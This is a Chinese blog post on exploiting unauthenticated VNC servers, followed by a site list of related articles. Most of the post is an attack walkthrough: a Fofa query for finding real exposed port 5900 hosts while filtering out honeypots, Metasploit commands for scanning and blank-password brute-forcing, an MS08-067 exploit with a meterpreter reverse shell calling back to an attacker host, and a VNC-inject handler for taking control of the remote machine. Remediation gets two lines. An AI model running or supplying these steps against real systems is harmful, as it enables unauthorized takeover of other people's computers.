VNC未授权访问漏洞

于 2024-08-05 16:02:25 发布
阅读量31 收藏
点赞数
分类专栏: 未授权访问漏洞 文章标签: VNC未授权访问漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63988455/article/details/140928862
版权

VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制target主机。

》》》漏洞复现《《《

msfconsole
set rhosts
set threads 100
run

步骤一:使用以下语句在Fofa上进行资产收集....

(port="5900") && (is_honeypot=false && is_fraud=false)

步骤二:可通过MSF中的模块进行检测与漏洞利用..

# VNC未授权检测
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 192.168.168.200-254
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run

# VNC密码爆破
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > 192.168.168.228
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.168.228
msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆破
msf6 auxiliary(scanner/vnc/vnc_login) > run

# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.168.228
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.168.102
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
获取会话后,直接run vnc可控制远程虚拟机

# 直接控制远程机器
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.168.102
msf6 exploit(multi/handler) > set lport 4466
msf6 exploit(multi/handler) > exploit

步骤三:VNC链接验证...

vncviewer ipaddress

漏洞修复

1. 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。
2. 以最小普通权限身份运行操作系统。
starhei.zxy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞挖掘】——88、VNC授权访问利用
Fly_鹏程万里
06-13 121
漏洞简介VNC(Virtual Network Computing)是一种远程桌面协议和软件系统,它允许用户通过网络远程控制和操作远程计算机,VNC协议使用客户端-服务器模型,其中VNC服务器在被控制的计算机上运行,而VNC客户端则在远程控制计算机的用户设备上运行,用通过VNC可以在本地计算机上查看和操作远程计算机的桌面界面就像直接坐在远程计算机前一样,VNC协议将远程计算机的图形界面信息传输到客户端并将客户端的输入动作传递给远程计算机,这使得用户可以远程访问和管理远程计算机核心组件。
vnc漏洞检测和复现工具
11-11
vnc漏洞检测和复现工具 5900端口
VNC 授权访问漏洞复现
W小哥
09-23 1万+
一、VNC 简介 VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。 二、VNC 授权访问漏洞危害 VNC 授权访问漏洞如被利用可能造成恶意用户直接控制目标主机。 三、靶场搭建 服务器: win10 IP: 192.168.241
常见授权访问漏洞详解
m0_55854679的博客
05-15 3219
参考文章1:二十八种授权访问漏洞合集 参考文章2:28种授权访问漏洞 简介 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 常见的授权访问漏洞 MongoDB 授权访问漏洞 漏洞信息 开启MongoDB服务时不添加任何参数,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作【增、删、改、查高危动作】而且可以远程访问数据库。 造成授权访问的根本原因就在于启动 Mongodb
授权访问VNC授权访问
qq_68163788的博客
05-13 855
VNC(Virtual Network Computing)是一种流行的远程控制计算机系统的协议。它允许用户通过网络从一台计算机查看和操作另一台计算机的桌面环境,就像坐在那台计算机前一样。然而,如果VNC服务器没有正确配置安全措施,比如设置访问密码或仅允许特定IP地址连接,就可能导致授权访问的风险。 授权访问意味着恶意攻击者可能会无需密码或通过猜测弱密码等手段,非法获取对VNC服务器的控制权限。一旦攻击者获得了访问权限,他们可以监控敏感信息、安装恶意软件、篡改数据甚至完全接管受害者的计算机系统。
授权访问漏洞
weixin_56378389的博客
04-11 1068
Redis;Docker
常见授权访问漏洞总结
weixin_50464560的博客
10-02 2290
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 常见的授权访问漏洞: Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS 授权访问漏洞 VNC 授权访问漏洞 Docker 授权访问漏洞 ZooKeeper 授权访问漏洞 Rsync 授权访问漏洞 Atlassian Crowd 授权访问漏洞 CouchDB 授权访问漏洞 Elasticsearch...
授权访问漏洞总结
m0_64481831的博客
06-18 1097
以下总结了常见的授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~
授权访问漏洞1
MingShenfree的博客
10-30 725
授权访问漏洞产生的原因 授权访问漏洞是站由于网站管理员对站点的资源所拥有的权限或站点配置文件没有进行合理的配置,导致没有进行授权的用户可以访问到高级资源。 常见的授权访问漏洞 (1)Redis授权访问漏洞简述:Redis是一种缓存数据库应用,它在部分场合可以对关系型数据库起到很好的补充作用。Redis默认会绑定在0.0.0.0:6379,这就会将Redis服务暴露到公网环境当中,在没有开启认证的情况下会导致任意可以访问到...
授权访问漏洞大全
热门推荐
yggcwhat
08-23 1万+
授权访问漏洞大全
redhat上vnc配置及windows访问设置
02-23
通过windows系统远程访问操作linux服务器,介绍vnc访问软件的设置,实现网络监控
昆仑通态VNC功能
01-09
例如,确保VNC连接的安全性,通常会采用加密连接,限制非授权访问,避免数据泄露。同时,定期更新VNC服务器和客户端软件,以应对可能出现的安全漏洞。 在提供的【远程vnc相关20180413】压缩包文件中,可能包含了...
vnc
03-05
然而,为了防止授权访问,必须确保使用强壮的密码,并定期更新VNC软件以修复任何已知的安全漏洞。 总之,VNC是一种强大的远程桌面解决方案,通过VNC.exe等组件,我们可以实现便捷的远程控制。但使用时务必...
基于卷积神经网络的语音识别声学模型的研究
08-04
【项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
VCD租借管理系统VB(源程序+论文).rar
08-04
VCD租借管理系统VB(源程序+论文)
嗖嗖移动大厅(Java)
08-04
嗖嗖移动大厅源码
android-studio-2022.3.1.22-windows.zip.001
最新发布
08-04
android-studio-2022.3.1.22-windows.zip.001 参考文档: https://blog.csdn.net/xzzteach/article/details/140911515 android-studio-2022.3.1.22-windows.zip.001 https://download.csdn.net/download/xzzteach/89614079 android-studio-2022.3.1.22-windows.zip.002 https://download.csdn.net/download/xzzteach/89614082 https://blog.csdn.net/xzzteach/article/details/140913786 【Android Studio】2022.3.1.22-windows版本(不要太新拒绝过老)安装使用一条龙教程(JDK1.8.0_201、API28(9)、gradle-6.5-all)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值